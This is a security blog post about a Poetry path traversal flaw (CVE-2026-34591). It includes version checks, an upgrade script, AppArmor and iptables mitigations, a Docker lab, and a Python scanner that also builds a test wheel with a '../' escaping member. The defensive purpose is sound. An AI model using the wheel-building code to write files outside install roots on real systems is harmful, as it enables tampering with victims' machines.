
Thursday, April 9, 2026

Stop Path Traversal Attacks in Python Poetry (CVE-2026-34591)

 



Check, fix, and block Poetry path traversal (CVE-2026-34591) with one bash script. Works on Ubuntu, Rocky, SUSE. Includes Docker lab.

A Practical, Distro-Agnostic Guide to Securing Your Python Dependency Manager


A now-patched vulnerability in python-poetry (versions 1.4.0 to 2.3.2) allowed a malicious PyPI package to write files anywhere on your system: a crafted wheel could carry archive member names containing ../ sequences, and Poetry did not reject them when unpacking the wheel. This article shows how to detect, fix, and mitigate this class of vulnerability, whenever you happen to read it.

How to check if you are vulnerable

Run these commands on your system. No internet access required – they check only your local installation.

Ubuntu / Debian (pip-installed Poetry)

bash
poetry --version
# Output looks like "Poetry (version 2.3.2)".
# Vulnerable if 1.4.0 <= version <= 2.3.2 (both bounds inclusive); 2.3.3 and later are fixed.


Rocky Linux / RHEL (EPEL)

bash
rpm -q python3-poetry
# Compare output with: 1.4.0 <= version <= 2.3.2


openSUSE / SLES (zypper)

bash
zypper info python311-poetry | grep Version
# Vulnerable version example: 1.7.1-150600.3.3.1 (the upstream part, 1.7.1, is between 1.4.0 and 2.3.2)


Universal check (any distro, pipx or pip)

bash
# Prints the version line only when it falls inside 1.4.0..2.3.2
# (1.4.x-1.9.x, 2.0.x-2.2.x, 2.3.0-2.3.2); silent output means you are not in range.
poetry --version 2>&1 | grep -E 'version (1\.[4-9]\.|2\.[0-2]\.|2\.3\.[0-2][^0-9])'


Automation script to apply the fix

Save as fix-poetry.sh and run it as the user who owns the Poetry installation (pipx and pip installs are per-user). The branches for distro packages call sudo, because those are system-wide.


bash
#!/bin/bash
# Fix for CVE-2026-34591 class path traversal in Poetry
set -euo pipefail

if ! command -v poetry >/dev/null 2>&1; then
    echo "poetry not found in PATH; nothing to do." >&2
    exit 0
fi

echo "Checking Poetry version..."
# `poetry --version` prints e.g. "Poetry (version 2.3.2)"; keep only the x.y.z part
POETRY_VER=$(poetry --version 2>/dev/null | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n1 || true)
if [ -z "$POETRY_VER" ]; then
    echo "Could not parse the output of 'poetry --version'." >&2
    exit 1
fi

# Convert to a comparable integer (e.g., 2.3.2 -> 20302, 1.4.0 -> 10400)
NORMALIZED=$(echo "$POETRY_VER" | awk -F. '{printf("%d%02d%02d", $1, $2, $3)}')

if [ "$NORMALIZED" -ge 10400 ] && [ "$NORMALIZED" -le 20302 ]; then
    echo "Vulnerable version $POETRY_VER detected. Upgrading..."

    # Detect the install method. Distro packages are checked before pip so a
    # pip install never shadows an rpm-managed Poetry.
    if command -v pipx >/dev/null 2>&1 && pipx list 2>/dev/null | grep -q poetry; then
        pipx upgrade poetry
    elif command -v rpm >/dev/null 2>&1 && rpm -q python3-poetry >/dev/null 2>&1; then
        sudo dnf upgrade -y python3-poetry            # Rocky / RHEL (EPEL)
    elif command -v rpm >/dev/null 2>&1 && rpm -q python311-poetry >/dev/null 2>&1; then
        sudo zypper --non-interactive update python311-poetry   # openSUSE / SLES
    elif command -v pip3 >/dev/null 2>&1 && pip3 show poetry >/dev/null 2>&1; then
        pip3 install --upgrade poetry
    else
        # Official installer; it upgrades an existing installer-managed Poetry in place
        curl -sSL https://install.python-poetry.org | python3 -
    fi

    NEW_VER=$(poetry --version)
    echo "Updated to $NEW_VER"
else
    echo "Version $POETRY_VER is outside the vulnerable range 1.4.0-2.3.2."
fi


Alternative mitigation if you can't update now

Until you can update, limit what a hostile wheel can do: keep Poetry from writing outside the project and its cache, and stop untrusted wheels before they reach developer machines. Remember that the ../ lives in the archive member names inside the wheel, not in the URL it is fetched from, which is why the network-level option below is the weakest of the three.

Option 1: iptables (drop plaintext mirror traffic carrying "../"; generic and crude)


bash
# Drop outbound plaintext HTTP to your mirror's address range when the payload contains "../"
# (replace 151.101.0.0/16 with the addresses of your own PyPI mirror)
sudo iptables -A OUTPUT -p tcp --dport 80 -d 151.101.0.0/16 -m string --string "../" --algo bm -j DROP
# Caveat: pypi.org and most mirrors speak TLS, so the string match never sees the payload;
# this only helps against an unencrypted HTTP mirror. Aggressive; use only as a temporary measure.


Option 2: AppArmor profile for Poetry (recommended on Ubuntu/Debian and SUSE; Rocky/RHEL ship SELinux instead)

Create /etc/apparmor.d/usr.bin.poetry. The profile header must be the path that `command -v poetry` reports (for a pipx install that is @{HOME}/.local/bin/poetry). AppArmor is default-deny, so the profile lists what Poetry may read, execute and write; every other write, including one that a ../ chain resolves to ~/.bashrc or /etc/cron.d/, is refused:

text
#include <tunables/global>

/usr/bin/poetry {
  #include <abstractions/base>
  #include <abstractions/python>
  #include <abstractions/nameservice>
  #include <abstractions/ssl_certs>

  network inet stream,
  network inet6 stream,

  # Read access to the interpreter, site-packages and the user's projects;
  # child interpreters inherit this profile (ix), so the unpacking step is covered too
  /usr/bin/python3* ix,
  /usr/** r,
  owner @{HOME}/** r,
  owner @{HOME}/**/.venv/bin/* ix,
  owner @{HOME}/.cache/pypoetry/virtualenvs/**/bin/* ix,

  # Write only to project files, project venvs and Poetry's own cache/config
  owner @{HOME}/**/poetry.lock rw,
  owner @{HOME}/**/pyproject.toml rw,
  owner @{HOME}/**/.venv/** rw,
  owner @{HOME}/.cache/pypoetry/** rw,
  owner @{HOME}/.config/pypoetry/** rw,
  owner /tmp/** rw,

  # Do not add "deny /**/* rw,": deny rules take precedence over allow rules,
  # so that line would also block the paths above and break Poetry entirely.
}



Load the profile in complain mode first, run a normal `poetry install`, review the logged denials (aa-logprof) and add any missing read rules, then enforce:

bash
sudo apparmor_parser -r /etc/apparmor.d/usr.bin.poetry
sudo aa-complain /usr/bin/poetry    # log-only while you tune the rules
sudo aa-enforce /usr/bin/poetry     # enforce once the profile is quiet

Option 3: Route installs through a local PyPI proxy (devpi) so wheels can be vetted before developers see them. Start it with this Docker command:

bash
docker run -p 3141:3141 -e DEVPI_ROOT_PASSWORD=secret -v /tmp/devpi:/data plone/devpi:latest
# Point Poetry at the proxy instead of pypi.org (run inside the project):
poetry source add --priority=primary local http://localhost:3141/root/pypi/+simple/
# devpi mirrors and caches; it does not inspect archive member names itself, so pair it with
# a scan of the cached wheels for ../ entries before they are released to developers.


Hands-on Lab: Reproduce & Test the Fix in 15 Minutes

Goal: Create a small Docker environment that installs a wheel whose archive contains a ../ member, then verify that the patched version refuses it while the vulnerable one writes outside the project.

Requirements: Docker installed, plus python3 on the host to serve the test wheel.

bash
# 1. Create test directory
mkdir poetry-lab && cd poetry-lab

# 2. Vulnerable environment (using older Poetry)
cat > Dockerfile.vuln <<'EOF'
FROM python:3.11-slim
RUN pip install poetry==2.2.0
WORKDIR /app
EOF

# 3. Safe environment (patched)
cat > Dockerfile.safe <<'EOF'
FROM python:3.11-slim
# Quote the requirement: an unquoted ">" would redirect pip's output to a file named "=2.3.3"
RUN pip install "poetry>=2.3.3"
WORKDIR /app
EOF

# 4. Serve the crafted test wheel from the host. The traversal is in the zip member
#    names, not in the URL, so place a wheel whose entries contain ../ in ./wheels/
#    (the file name payload-0.1.0-py3-none-any.whl and the marker file
#    poetry_traversal_test.txt below are lab placeholders; use your own fixture's names).
mkdir -p wheels
(cd wheels && python3 -m http.server 8000 >/dev/null 2>&1 &)   # stop later: pkill -f 'http.server 8000'

# 5. Build and run vulnerable container (--add-host lets the container reach the host's server on Linux)
WHEEL_URL=http://host.docker.internal:8000/payload-0.1.0-py3-none-any.whl
docker build -f Dockerfile.vuln -t poetry-vuln .
docker run -it --rm --add-host=host.docker.internal:host-gateway poetry-vuln /bin/bash -c \
  "poetry new test && cd test && poetry add $WHEEL_URL; find / -name poetry_traversal_test.txt 2>/dev/null"

# 6. Build and run safe container
docker build -f Dockerfile.safe -t poetry-safe .
docker run -it --rm --add-host=host.docker.internal:host-gateway poetry-safe /bin/bash -c \
  "poetry new test && cd test && poetry add $WHEEL_URL; find / -name poetry_traversal_test.txt 2>/dev/null"


Observe: in the vulnerable container, find prints the marker file at a path outside /app/test, wherever the ../ chain resolved from site-packages; in the patched container Poetry rejects the wheel or sanitizes the member path, and find prints nothing.
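The mitigation section asks for wheels with ../ in their member names to be stopped before installation, and the lab needs a test wheel of exactly that shape. The script below is an added example written for this article, not code from the Poetry project: it flags any archive member that would escape the install root (parent-directory components, absolute paths, Windows drive letters or backslashes) and, with --fixture, writes a constructed test wheel named payload-0.1.0-py3-none-any.whl whose single escaping member is poetry_traversal_test.txt. All package, file and function names are made up for the example; the per-file containment check (resolve the destination, require it to stay under the root) is the guard an installer must apply, and the scanner generalizes it to every hostile name form, not only ../.

```python
#!/usr/bin/env python3
"""wheel_guard.py: reject wheels whose archive members escape the install root.

A wheel is a zip archive. Every member name must be a relative POSIX path that
stays under the target directory once normalized; anything else is a path
traversal attempt. This scanner flags such members and can write a constructed
test wheel (one benign module plus one escaping member) for the lab.
"""
import io
import os
import posixpath
import sys
import zipfile
from typing import List

# Constructed fixture names (hypothetical; not from any real package)
FIXTURE_WHEEL = "payload-0.1.0-py3-none-any.whl"
ESCAPING_MEMBER = "../../../../../../poetry_traversal_test.txt"


def is_unsafe_member(name: str) -> bool:
    """True if a zip member name could land outside the install root."""
    if not name or "\x00" in name:
        return True
    if "\\" in name:                        # backslash is a separator on Windows
        return True
    if name.startswith("/"):                # absolute POSIX path
        return True
    if len(name) > 1 and name[0].isalpha() and name[1] == ":":
        return True                         # Windows drive letter, e.g. C:...
    if ".." in name.split("/"):             # any parent-directory component
        return True
    norm = posixpath.normpath(name)         # second look after normalization
    return norm == ".." or norm.startswith("../") or posixpath.isabs(norm)


def unsafe_members(wheel_bytes: bytes) -> List[str]:
    """Return every member name in the wheel that fails is_unsafe_member."""
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        return [n for n in zf.namelist() if is_unsafe_member(n)]


def is_contained(root: str, member: str) -> bool:
    """Per-file check an installer should make before writing: resolve the
    destination (symlinks included) and require it to stay under root."""
    root_real = os.path.realpath(root)
    dest = os.path.realpath(os.path.join(root_real, *member.split("/")))
    return os.path.commonpath([root_real, dest]) == root_real


def build_test_wheel() -> bytes:
    """Constructed fixture: a minimal wheel with one legitimate module and one
    member whose name climbs out of site-packages with ../ sequences."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payload/__init__.py", "print('payload loaded')\n")
        zf.writestr("payload-0.1.0.dist-info/METADATA",
                    "Metadata-Version: 2.1\nName: payload\nVersion: 0.1.0\n")
        zf.writestr("payload-0.1.0.dist-info/WHEEL",
                    "Wheel-Version: 1.0\nGenerator: wheel_guard\n"
                    "Root-Is-Purelib: true\nTag: py3-none-any\n")
        zf.writestr(ESCAPING_MEMBER, "escaped the install root\n")
        zf.writestr("payload-0.1.0.dist-info/RECORD",
                    "payload/__init__.py,,\n"
                    "payload-0.1.0.dist-info/METADATA,,\n"
                    "payload-0.1.0.dist-info/WHEEL,,\n"
                    f"{ESCAPING_MEMBER},,\n"
                    "payload-0.1.0.dist-info/RECORD,,\n")
    return buf.getvalue()


def main(argv: List[str]) -> int:
    if len(argv) >= 3 and argv[1] == "--fixture":
        os.makedirs(argv[2], exist_ok=True)
        path = os.path.join(argv[2], FIXTURE_WHEEL)
        with open(path, "wb") as fh:
            fh.write(build_test_wheel())
        print(f"wrote constructed test wheel to {path}")
        return 0
    if len(argv) < 2:
        print("usage: wheel_guard.py (--fixture DIR | WHEEL...)", file=sys.stderr)
        return 2
    rc = 0
    for path in argv[1:]:
        with open(path, "rb") as fh:
            bad = unsafe_members(fh.read())
        if bad:
            rc = 1
            print(f"REJECT {path}: " + ", ".join(bad))
        else:
            print(f"ok     {path}")
    return rc


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Scan wheels before they reach developers with `python3 wheel_guard.py path/to/*.whl` (exit status 1 if any member is rejected); for the lab, `python3 wheel_guard.py --fixture wheels` drops the test wheel into the directory served by http.server. Name filtering and is_contained are both needed: the name check catches the obvious ../ and absolute forms up front, while the realpath check also catches escapes through symlinks that already exist in the target tree, which no amount of string normalization can see.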


Suggested books:

- Python Web Penetration Testing Cookbook, by Cameron Buchanan - Amazon
- Python for Security and Networking, by José Manuel Ortega (Packt, 2023, 3rd edition) - Amazon
- Applied Cryptography using Python, by Ramesh Nagappan & Gourav Shenoy - Amazon


